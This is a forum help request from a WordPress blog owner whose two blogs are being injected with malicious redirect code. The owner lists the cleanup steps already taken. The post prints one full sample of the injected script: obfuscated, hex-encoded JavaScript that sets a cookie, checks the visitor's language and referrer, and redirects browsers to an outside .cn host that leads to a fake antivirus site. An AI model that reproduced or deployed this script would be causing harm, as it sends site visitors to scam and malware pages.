Hack/malware redirecting to another site
-
I have two WordPress blogs which are under virtual subdomains on the same domain:
http://aiheet.domnik.net/
http://lr.domnik.net/(both are in Finnish)
Now in both of them the content is occasionnally replaced with a malicious JavaScript code that redirects the browser to fake antivirus site computer-antivirus03.com.
The content that the script writes over can be the blog home page, an individual post or page, and sometimes even a css style sheet. The script is not always the same, but looks somewhat like this:
<script type="text/javascript" language="javascript"> var lprcb=new Date( ); lprcb.setTime(lprcb.getTime( )+12*60*60*1000); document.cookie="\x6e\x5f\x73\x65\x73s\x5f\x69d\x3d\x30\x64\x38\x657cba\x65\x64\x63\x39\x61\x34\x35\x371\x61\x62e\x37\x61\x37\x32\x35\x36\x64\x31e\x65\x617"+"\x3b\x20path=/;\x20expire\x73="+lprcb.toGMTString( ); </script> <script type="text/javascript" language="javascript"> var iyssffn=new Array("ht\x74\x70://t\x68e-off\x73\x70\x72\x69\x6e\x67\x2e\x63\x6e/\x3f\x70i\x64\x3d1\x38\x30s0\x38\x26s\x69\x64\x3d3c\x357\x37\x39","\x68\x74tp:\x2f\x2f\x74h\x65-o\x66fsp\x72ing.c\x6e\x2f\x3fpi\x64\x3d\x31\x380\x73\x30\x39\x26si\x64\x3d3\x635\x377\x39"); var kumh="\143\x61,co\x2c\144\x61,de,c\x79,el\x2cen,\x65o,e\x73,fi\x2cfr\x2cga\x2ci\x74,j\x61,j\x69,\x6bn\x2cnl\x2cno\x2cpt\x2csv"; var wlmnfsc=navigator.language || navigator.systemLanguage; var lang=wlmnfsc.toLowerCase( ); lang=lang.substr(0,2); if (kumh.indexOf(lang)==-1){zeck( ); }else {eylgnov(omqmeq( )?iyssffn[0]:iyssffn[1]); }function eylgnov(hrnmj){if (top.location.href!=window.location.href){top.location=hrnmj; }else {document.writeln("\x3cM\x45\x54A \x48TTP-EQ\x55IV=47Re\x66res\x6847\x20C\x4fNT\x45N\x54=470;\x20UR\x4c="+hrnmj+"\x27>"); document.writeln("74meta ht\x74\160\x2dequiv\x3d47\x70ra\x67ma\x27 co\x6eten\x74=\x27no\x2dca\x63he\x27>"); document.writeln("\x3cmeta \x6e\141\x6de=47\x72o\x62ots\x27 con\x74en\x74=47noi\x6ede\x78,n\x6ff\x6fll\x6fw\x27>"); }}function zeck( ){eylgnov(omqmeq( )?iyssffn[2]:iyssffn[3]); return; }function omqmeq( ){alert(document.referrer); return document.referrer.indexOf("\x67oo\x67\x6ce.") || document.referrer.indexOf("\x79ahoo.") || document.referrer.indexOf("bi\x6eg."); } </script>It doesn’t show up every time. Sometimes I have to browse around for a while before I can see it.
For two more examples (first one is the same as above), see:
What have I already done:
I replaced all the core files in both blogs with brand new ones from new WordPress download (it was version 2.8.4 already when hacked).
I examined my template files and didn’t find anything suspicious.
I removed all plugins that I don’t use.
I uploaded plugins Antivirus, WordPress Exploit Scanner and WP Security Scan to see if they find something. I corrected one chmod proposed by WP Security Scan (wp-admin/index.php to chmod 644). It also said “The file .htaccess does not exist in wp-admin/.” Should I have one there?
Exploit Scanner found some suspicious “String.fromCharCode” and “shell_exec” from several files but those seem to exist in clean WordPress files too.
I have contacted my webhost (I am on shared hosting) and sent them basically the same info. No reply yet.
I have changed all the password (they were random generated before and they are still random generated).
I am the only one who has admin rights to the blogs and for last few months I have accessed them only from my own computer which runs Ubuntu. The other blog has one co-blogger but he has only editor rights.
Any ideas how to proceed and get rid of the code?
The topic ‘Hack/malware redirecting to another site’ is closed to new replies.